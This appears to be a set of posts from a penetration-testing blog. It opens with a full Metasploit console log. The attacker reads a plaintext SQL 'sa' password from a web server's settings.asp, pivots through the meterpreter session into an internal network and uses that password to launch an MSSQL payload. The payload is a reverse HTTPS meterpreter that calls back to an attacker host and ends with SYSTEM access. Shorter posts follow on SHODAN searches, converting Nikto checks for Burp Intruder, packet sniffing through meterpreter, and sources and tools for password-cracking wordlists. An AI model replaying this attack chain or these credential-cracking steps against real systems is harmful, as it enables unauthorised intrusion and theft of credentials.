meterpreter > getuid

Server username: NT AUTHORITY\NETWORK SERVICE

meterpreter > pwd

C:\Inetpub\wwwroot

meterpreter > ls

Listing: C:\Inetpub\wwwroot

===========================

Mode              Size    Type  Last modified                   Name

----              ----    ----  -------------                   ----

40777/rwxrwxrwx   0       dir   Fri May 07 09:32:19 -0400 2010  .

40777/rwxrwxrwx   0       dir   Mon May 03 12:51:48 -0400 2010  ..

40777/rwxrwxrwx   0       dir   Mon May 03 12:12:57 -0400 2010  admin

100666/rw-rw-rw-  1587    fil   Sat Dec 08 23:01:24 -0500 2001  default.asp

100666/rw-rw-rw-  1465    fil   Sat Dec 08 23:01:24 -0500 2001  default.css

100666/rw-rw-rw-  3295    fil   Thu Jan 03 12:40:48 -0500 2002  forgotpass.asp

40777/rwxrwxrwx   0       dir   Mon May 03 12:12:57 -0400 2010  images

40777/rwxrwxrwx   0       dir   Mon May 03 12:12:57 -0400 2010  language

100666/rw-rw-rw-  1802    fil   Thu Jan 24 12:10:04 -0500 2002  logoff.asp

100666/rw-rw-rw-  7785    fil   Sat Jun 15 19:49:20 -0400 2002  logon.asp

100666/rw-rw-rw-  1801    fil   Mon May 03 12:42:45 -0400 2010  settings.asp

100666/rw-rw-rw-  21137   fil   Wed Aug 28 11:31:42 -0400 2002  setup.asp

meterpreter > cat settings.asp

<SCRIPT LANGUAGE = "VBScript">

<(editorial snip)>

SQLUser = "sa" 

SQLPass = "SuperDuper#@rdP@$$w0rd2012"

<(/editorial snip)>

</SCRIPT>

meterpreter > 

Background session 1? [y/N]  

msf exploit(handler) > route add 192.168.56.0 255.255.255.0 1

msf exploit(handler) > route print

Active Routing Table

====================

   Subnet             Netmask            Gateway

   ------             -------            -------

   192.168.56.0       255.255.255.0      Session 1

msf exploit(handler) > use scanner/mssql/mssql_login

msf auxiliary(mssql_login) > set BLANK_PASSWORDS false

BLANK_PASSWORDS => false

msf auxiliary(mssql_login) > set PASSWORD SuperDuper#@rdP@$$w0rd2012

 

PASSWORD => SuperDuper#@rdP@$$w0rd2012

 

msf auxiliary(mssql_login) > set RHOSTS 192.168.56.3

RHOSTS => 192.168.56.3

msf auxiliary(mssql_login) > run

[*] 192.168.56.3:1433 - MSSQL - Trying username:'sa' with password:'SuperDuper#@rdP@$$w0rd2012'

[+] 192.168.56.3:1433 - MSSQL - successful login 'sa' : 'SuperDuper#@rdP@$$w0rd2012'

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

msf auxiliary(mssql_enum) > use windows/mssql/mssql_payload

msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_https

PAYLOAD => windows/meterpreter/reverse_https

msf exploit(mssql_payload) > set LHOST 10.10.10.59

LHOST => 10.10.10.59

msf exploit(mssql_payload) > set RHOST 192.168.56.3

RHOST => 192.168.56.3

msf exploit(mssql_payload) > set LPORT 443

LPORT => 443

msf exploit(mssql_payload) > set PASSWORD SuperDuper#@rdP@$$w0rd2012

 

PASSWORD => SuperDuper#@rdP@$$w0rd2012

 

msf exploit(mssql_payload) > exploit

[*] HTTPS listener started on https://10.10.10.59:443/

[*] Command Stager progress - 2.78% done (1494/53675 bytes)

[*] Command Stager progress - 5.57% done (2988/53675 bytes)

[*] Command Stager progress - 8.35% done (4482/53675 bytes)

<(editorial snip)>

[*] Command Stager progress - 94.64% done (50796/53675 bytes)

[*] Command Stager progress - 97.32% done (52235/53675 bytes)

[*] 192.168.56.3:1061 Request received for /AvlbV...

[*] 192.168.56.3:1061 Staging connection for target vlbV received...

[*] Patching Target ID vlbV into DLL

[*] 192.168.56.3:1062 Request received for /BvlbV...

[*] 192.168.56.3:1062 Stage connection for target vlbV received...

[*] Meterpreter session 2 opened (10.10.10.59:443 -> 192.168.56.3:1062) at Thu May 06 22:03:50 -0400 2010

[*] Exploit completed, but no session was created.

msf exploit(mssql_payload) > sessions -i 2

[*] Starting interaction with 2...

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM

If you haven't seen it all over twitter yet, achillean released the "beta" of SHODAN yesterday. It's a search engine of basically a nmap of the internet (ports 21, 22, 23 or 80 so far).

http://shodan.surtri.com/

You can search by keyword, and/or using any of the advanced search options.

 

• country:2-letter country code
• hostname:full or partial host name
• net:IP range using CIDR notation (ex: 18.7.7.0/24 )
• port:21, 22, 23 or 80

Here is just a taste of the power this bring to the game:

 

 

Let your mind run wild. I imagine this search engine will do nothing but grow. Remember, as with any service, your searches are happening on someone else's servers, be gentle (it's free.. right now) and be wary, you don't want to put too much data about a customer ;-)

Thanks go to HD Moore for the head up about the service, and Thierry Zoller for adding flame to the fire of crazy searches to try on this new service.

 

CKTricky over at http://cktricky.blogspot.com has been running an awesome Burp Tip of the Day series on his blog. After seeing him use Nikto through Burp. I decided to see if I could just export the list of checks to a text file so that I could use them over and over in Intruder. After a bit of awk and sed hell I figured it out, and submited it to him for acceptance to his BTotD series. Yesterday it was posted ;-)

Here: http://cktricky.blogspot.com/2009/10/btod-importing-nikto-db-to-intruder.html

Here is the ugly command I came up with:

cat /pentest/web/nikto/plugins/db_tests | awk -F "," '{print $4}' | sed 's/^\"*//;s/\"$//' | sed 's/^\@CGIDIRS//;s/\@ADMIN//;s/^\@NUKE//;s/^\@POSTNUKE//;s/^\@PHPMYADMIN//' | sed 's/^\///' > ~/nikto_burp.txt

What you are sacrificing here are the checks for the CGIDIRS, ADMIN, NUKE, POSTNUKE, and PHPMYADMIN interfaces. Personally, I've modified this script a bit, but you can modify it how best fits your tests:

cat /pentest/web/nikto/plugins/db_tests | awk -F "," '{print $4}' | sed 's/^\"*//;s/\"$//' | sed 's/^\@CGIDIRS/cgi\-bin\//;s/\@ADMIN//;s/^\@NUKE//;s/^\@POSTNUKE//;s/^\@PHPMYADMIN/phpMyAdmin\//' | sed 's/^\///' > ~/nikto_burp.txt

So that I could cover at least the most common cgi and phpmyadmin directories 

So this is a pretty crafty way of getting packet captures on a target system. Definitely could be streamlined with some meterpreter scripting fu, but awesome job on the video.

 

Metasploit meterpreter Windump/Winpcap sniffer from siles on Vimeo.

Brute force, even though it's gotten so fast, is still a long way away from cracking long complex passwords. That's were word lists come in handy. It's usually the crackers first go-to solution, slam a word list against the hash, if that doesn't work, try rainbow tables (if they happen to have the tables for that specific hash type), and then the full on brute force. Some would say those first two steps are reversed, and it really is the choice of the the person doing it and the word lists they have to work with.

Matt Weir and company created a cool tool that has the best of both worlds, Dictionary based Rainbow Tables with Dr-Crack, which you can find here:

http://reusablesec.googlepages.com/drcrack

But, back to the reason of this post, word lists. Where do you get them? Here are a couple of my favorite places in no particular order:

http://www.packetstormsecurity.org/Crackers/wordlists/
http://www.theargon.com/achilles/wordlists/
http://www.openwall.com/wordlists/
http://www.outpost9.com/files/WordLists.html

I like to keep 3 size word lists:
1. small and fast: usually based on the output of one of the tools i'm about to tell you about
2. medium: this is my custom list that I add passwords I find / crack and generally think are good to add. I'm pretty picky about what goes into this list
3. huge: any wordlist I come across gets added to this list, it gets sorted and uniqued and restored

Now the two tools that I like for the small list is are CeWL and wyd

CeWL - http://www.digininja.org/projects/cewl.php
Wyd - http://www.remote-exploit.org/codes_wyd.html

They have some very similar lists of features, your mileage may vary. But they basically parse files and web pages for words and generate password lists based on the words found.